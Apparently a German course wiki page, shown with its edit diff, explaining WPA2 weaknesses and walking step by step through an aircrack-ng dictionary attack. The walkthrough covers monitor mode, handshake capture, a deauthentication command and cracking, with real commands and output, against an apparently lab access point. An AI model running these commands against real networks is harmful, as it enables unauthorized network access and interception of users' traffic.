WPA2-Angriff: Difference between revisions

From
Jump to navigation Jump to search
(Angriffsdurchführung vervollständigt)
No edit summary
Line 1: Line 1:
WPA2 ist ein Sicherheitsprotokoll zum Schützen drahtloser Heim- und Firmennetzwerke. Dabei wird durch WPA2 der gesamte Netzwerkverkehr, der mit dem Netzwerk verbundenen Geräte, verschlüsselt sowie weitere Vorkehrungen getroffen, sodass Angreifern das Eindringen in das Netzwerk erschwert wird. Der WPA2-Standard ist eine Erweiterung des Vorgängers WPA. Der Nachfolger des WPA2-Standards wird derzeit unter dem Namen WPA3 entwickelt.
WPA2 ist ein Sicherheitsprotokoll zum Schützen drahtloser Heim- und Firmennetzwerke. Dabei wird durch WPA2 der gesamte Netzwerkverkehr, der mit dem Netzwerk verbundenen Geräte, verschlüsselt sowie weitere Vorkehrungen getroffen, sodass Angreifern das Eindringen in das Netzwerk erschwert wird. Der WPA2-Standard ist eine Erweiterung des Vorgängers WPA. Der Nachfolger des WPA2-Standards wird derzeit unter dem Namen WPA3 entwickelt.


Mit dem Entwurf des neuen WPA3-Standards wurden bei der Suche nach weiteren Angriffsmöglichkeiten Sicherheitslücken innerhalb des von WPA/WPA2 verwendeten 4-way-handshakes gefunden. <ref>[https://hashcat.net/forum/thread-7717.html]</ref>
Mit dem Entwurf des neuen WPA3-Standards wurden bei der Suche nach weiteren Angriffsmöglichkeiten Sicherheitslücken innerhalb des von WPA/WPA2 verwendeten 4-way-handshakes gefunden. [https://hashcat.net/forum/thread-7717.html]
Dabei ermöglicht die Sicherheitslücke einen Brut-Force-Angriff auf das WLAN-Passwort des Zielrouters, sodass der Angreifer Internetzugang über den angegriffenen Router erhalten kann.
Dabei ermöglicht die Sicherheitslücke einen Brut-Force-Angriff auf das WLAN-Passwort des Zielrouters, sodass der Angreifer Internetzugang über den angegriffenen Router erhalten kann.



Revision as of 10:38, 9 October 2018

WPA2 ist ein Sicherheitsprotokoll zum Schützen drahtloser Heim- und Firmennetzwerke. Dabei wird durch WPA2 der gesamte Netzwerkverkehr, der mit dem Netzwerk verbundenen Geräte, verschlüsselt sowie weitere Vorkehrungen getroffen, sodass Angreifern das Eindringen in das Netzwerk erschwert wird. Der WPA2-Standard ist eine Erweiterung des Vorgängers WPA. Der Nachfolger des WPA2-Standards wird derzeit unter dem Namen WPA3 entwickelt.

Mit dem Entwurf des neuen WPA3-Standards wurden bei der Suche nach weiteren Angriffsmöglichkeiten Sicherheitslücken innerhalb des von WPA/WPA2 verwendeten 4-way-handshakes gefunden. [1] Dabei ermöglicht die Sicherheitslücke einen Brut-Force-Angriff auf das WLAN-Passwort des Zielrouters, sodass der Angreifer Internetzugang über den angegriffenen Router erhalten kann.

Neben den Brute-Force-Angriffe auf das WLAN-Passwort, kann auch eine Key Reinstallation Attack (KRACK) ausgeführt werden. Ein solcher Angriff ermöglicht es dem Angreifer, den Netzwerk-Verkehr des Angegriffenen zu entschlüsseln und somit den Inhalt der Pakete zu lesen. So kann der Angreifer sensible Informationen wie Benutzernamen, Passwörter, Bankverbindungen und ähnliches erhalten.

Geschichte

WPA2-Grundlagen

Brute-Force-Angriff

Mittels des Brute-Force-Angriffs versucht der Angreifer das Zugangs-Passwort eines WLAN-Netzwerks zu erhalten. Dazu muss der Angreifer lediglich einen EAPOL-Frame, d. h. eine Nachricht des 4-Way-Handshakes, der bei der Verbindung eines Gerätes mit dem Access Point (AP) durchgeführt wird, mitschneiden. Der Mitschnitt enthält dabei die PMKID, welche für den Angriff benötigt wird. Die PMKID setzt sich dabei wie folgt zusammen:


PMKID = HMAC-SHA1-128(PMK, ESSID | BSSID | MAC Client)


Wurden alle notwendigen Daten ermitellt, kann der Brute-Force-Angriff auf den PMK durchgeführt werden.

Angriff

Der Brute-Force-Angriff auf WPA/WPA2 lässt sich in drei Phasen unterteilen. Hierbei sind die ersten zwei Phasen im Netzwerk auszuführen, die dritte kann offline erfolgen. Im Folgenden werden die einzelnen Phasen des Angriffs erklärt.


  1. Informationen über den anzugreifenden Access Point sammeln (ESSID, BSSID, Channel).
  2. Einen EAPOL-Frame des 4-way-handshakes mitschneiden
    • Deauthentifizierungs-Angriff
  3. Brute-Force-Angriff auf den mitgeschnitten 4-way-handshake


Um den Angriff erfolgreich ausführen zu können, muss zuerst der anzugreifende Access Point ausgewählt werden. Dazu muss die Netzwerkkarte des Angreifers in den Monitoring-Modus versetzt werden. Ist dies geschehen, kann der ESSID (Name) des Access Points, die BSSID (MAC-Adresse) des Access Points so wie der Channel (Funkkanal) ermittelt werden. Wurden die benötigten Informationen gesammelt, kann nun gezielt der Netzwerkverkehr zwischen dem Access Point und anderen Geräten abgehört werden.

Im zweiten Schritt wird mittels der zuvor gesammelten Informationen die Kommunikation des Access Points belauscht. Es muss solange gewartet werden, bis ein neues Gerät in das WLAN-Netzwerk aufgenommen und dadurch ein 4-way-handshake durchgeführt wird. Dabei muss mindestens ein EAPOL-Frame des 4-way-handshakes aufgezeichnet werden. Aus dem mitgeschnittenen EAPOL-Frame können nun alle für die Brute-Force-Attacke benötigten Informationen abgeleitet werden, dies sind die MAC-Adresse des Clienten, von dem aus die Authentifizierung erfolgte sowie die verwendete PMKID. Dauert es zu lange, bis sich ein neues Gerät mit dem AP verbinden möchte, kann ein Deauthentifizierungs-Angriff durchgeführt werden. Dabei wird über die Netzwerkkarte des Angreifers die Reauthentifizierung aller mit dem anzugreifenden AP verbundenen Geräte erzwungen. Es besteht bei diesem Vorgehen jedoch eine Chance, durch die Benutzer des Netzwerks bemerkt zu werden.

Im dritten Schritt wird der Brute-Force-Angriff durchgeführt. Folgende Informationen sind dazu vorhanden

  • ESSID
  • BSSID
  • MAC Client
  • PMKID

es fehlt somit nur noch der verwendete PMK. Dieser PMK kann nun durch den Angriff erraten werden, indem mittels des oben vorgestellten Verfahrens zur Berechnung der PMKID versucht wird, eine Hash-Kollision zu finden. Wurde für einen geratenen PMK eine Kollision festgestellt, ist der Angriff beendet und das Zugangs-Passwort gefunden. Der Brute-Force-Angriff lässt sich, je nach Tool / Programmierung, auf mehrere verschiedene Weisen durchführen - als Wöterbuch-Angriff, als regelbasierter WörtebBuch-Angriff oder über reguläre Ausdrücke.

Angriffsarten

Wörterbuch-Angriff

Für den Wörterbuch-Angriff wird z.B. eine Passwortliste benötigt. Diese Listen enthalten durch Angriffe aller Art erhaltene Passwörter, welche durch reale Benutzer bei verschiedensten Diensten benutzt werden. Es wird nun jedes Passwort dieser Liste ausprobiert. Ist das Passwort in der Liste enthalten, kann ein effizienter Brute-Force-Angriff durchgeführt werden. Ist das Passwort jedoch nicht in der Liste enthalten, bleibt der Wörterbuch-Angriff erfolglos. Passwortlisten können online heruntergeladen, eine frei zugängliche ist z.B unter https://github.com/danielmiessler/SecLists/tree/master/Passwords zu finden. Als Alternative dienen auch Wörterbücher oder selbstgenerierte Listen.

Reguläre Ausdrücke

Einige Tools lassen die Verwendung von regulären Ausdrücken für Brute-Force-Angriffe zu. Hierbei muss mittels eines regulären Ausdrucks eine Vermutung über das Passwort angestellt werden, z.B. die Länge, die verwendeten Zeichen etc. Anschließend werden alle möglichen Kombinationen für den regulären Ausdruck berechnet. Dies ist für den Angreifer sehr rechenaufwändig, und kann gerade bei starken Passwörtern sehr lange dauern.

Regelbasierter Angriff

Der regelbasierte Angriff ist eine spezielle Art des Wörterbuchangriffs. Hierbei werden nach bestimmten Regeln Permutationen der in der Liste enthaltenen Passwörter generiert, welche ebenfalls als PMK probiert werden.

Wörterbuchangriff mit AirCrack unter Linux

Dieses Beispiel setzt die Installation folgender Tools in der aktuellsten Version voraus:

Zudem muss eine Passwortliste lokal vorhanden sein.

Vorbereitung

Zuerst muss alles für den Angriff vorbereitet werden. Dazu muss die für den Angriff verwendete Netzwerkkarte in den Monitoring-Modus versetzt werden. Dazu kann wie folgt vorgegangen werden:

1. Ermitteln des Interface-Namens der Netzwerkkarte:

root@kali: iwconfig

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=off   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
lo        no wireless extensions.


2. WLAN-Karte in den Monitor-Modus versetzen:

root@kali: airmon-ng start wlan0

AirCrack überprüft beim Ausführen des Befehls, ob Prozesse existieren, die das Aktivieren des Monitoring-Modus verhindern. Werden welche gefunden, fragt AirCrack, ob diese abgebrochen werden sollen. Diese Frage kann mit Y bestätigt werden. Andernfalls kann auch

airmon-ng check kill

verwendet werden und anschließend der Startbefehl erneut durchgeführt werden. Nun sollte die Netzwerkkarte in den Monitoring-Modus versetzt worden sein.


3. Überprüfen des Interfaces:

Nun sollte der Monitor-Modus abgezeigt werden. In diesem Beispiel ändert sich zudem der Interface-Name zu wlan0mon.

root@kali: iwconfig

eth0      no wireless extensions.

lo        no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off

Durchführung

1. Informationen sammeln

Zuerst müssen die benötigten Informationen über das anzugreifende Netzwerk gesammelt werden. Um eine Übersicht über alle empfangen Netzwerke zu bekommen wird folgender Befehl ausgeführt:

root@kali: airodump-ng wlan0mon


 CH  4 ][ Elapsed: 6 s ][ 2018-10-08 10:57                                         
                                                                                                                                                     
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                     
 12:34:56:78:9A:BC  -40        2        0    0  11  130  WPA2 CCMP   PSK  HackMe!                                                                    
 00:00:00:00:00:00  -41        2        0    0  11  130  WPA2 CCMP   PSK  FRITZ!Box Fon WLAN                                                    
 11:11:11:11:11:11  -78        1        0    0   6   65  WPA2 CCMP   PSK  DIRECT-91-HP ENVY 
 22:22:22:22:22:22  -83        5        0    0   1  130  WPA2 CCMP   PSK  XT                                                                   
                                                                                                                                                     
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                            
                                                                                                                                                     
 (not associated)   33:33:33:33:33:33  -90    0 - 1      0        1  GetOff                                                                           
 (not associated)   44:44:44:44:44:44  -90    0 - 1      0        2  EasyBox                                                                   

Nachdem der anzugreifende Access Point gefunden wurde, kann das Programm mit Strg + C abgebrochen werden. Nun haben wir die ersten notwendigen Informationen über den anzugreifenden Access Point erhalten, in diesem Fall:

  • BSSID: 12:34:56:78:9A:BC
  • CH: 11
  • ESSID: HackMe!


2. 4-way-handshake mitschneiden

Nachdem nun alle notwendigen Informationen vorhanden sind, muss ein EAPOL-Frame des 4-way-handshakes mitgeschnitten werden. Dieser wird automatisch in einer .cap-Datei gespeichert.

root@kali: airodump-ng --bssid 12:34:56:78:9A:BC -c 11 --write Logdatei wlan0mon


 CH 11 ][ Elapsed: 1 min ][ 2018-10-08 11:02 ][ WPA handshake: 36:31:C4:E
                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER 
                                                                         
 12:34:56:78:9A:BC  -42  90      235       31    0  11  130  WPA2 CCMP   
                                                                         
 BSSID              STATION            PWR   Rate    Lost    Frames  Prob
                                                                         
 12:34:56:78:9A:BC  00:11:22:33:44:55  -48    1e-48e   139       33   

Wurde ein Handshake aufgenommen, erscheint oben rechts die Aneige [WPA handshake:. Ist dies erfolgt, kann das Programm mit Str + C abgebrochen werden.

Wird lange Zeit kein neuer Client mit dem Access Point verbunden, kann eine Deauthentifizierungs-Attacke durchgeführt werden. Durch diese Art von Angriff werden alle bereits verbundenen Clienten dazu gezwungen, sich bei dem Access Point zu reauthentifizieren, was whs. zur Durchführung neuer Handshakes führt. Jedoch kann diese Art von Angriff durch den Benutzer bemerkt werden. Um den Angriff auszuführen, kann folgender Befehl verwendet werden:

aireplay-ng --deauth 100 -a 12:34:56:78:9A:BC wlan0mon

3. Brute-Force-Angriff

Die im vorherigen Schritt erzeugte Logdatei-01.cap enthält nun einen EAPOL-Frame des 4-way-handshakes mit allen notwendigen Informationen (ESSID, BSSID, MAC Client und PMKID). Mit diesen Informationen kann der Brute-Force-Angriff durchgeführt werden, indem der fehlenden PMK geraten und das Ergebnis der Hashfunktion mit der PMKID verglichen wird. Sind diese identisch, wurde das Passwort gefunden. Die Ausgabe erfolgt in Plaintext.

root@kali: aircrack-ng Logdatei-01.cap -w /Pfad/Zur/Passwortliste.txt

[00:00:00] 24/4799 keys tested (597.51 k/s) 

      Time left: 7 seconds                                       0.58%

                           KEY FOUND! [ 12345678 ]


      Master Key     : CF 82 97 8B 37 2E 39 FE F5 73 95 59 45 A6 AE 01 
                       1A C8 A3 A1 FA 61 3B AF EB 5E 85 E6 3B B7 89 5B 

      Transient Key  : 87 12 F7 00 02 E3 5D 1D C0 79 95 09 3E A7 C5 E4 
                       48 3E B8 ED 01 28 A7 8A 2A F2 28 1D 6B 5D DA 71 
                       A0 03 2E E5 4C C3 7A 9F 9F E3 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : AF 9C A2 71 13 BD 66 7E BD 02 CE F1 88 27 4B 08 

Key Reinstallation Attack (???)

Einzelnachweise

<references/>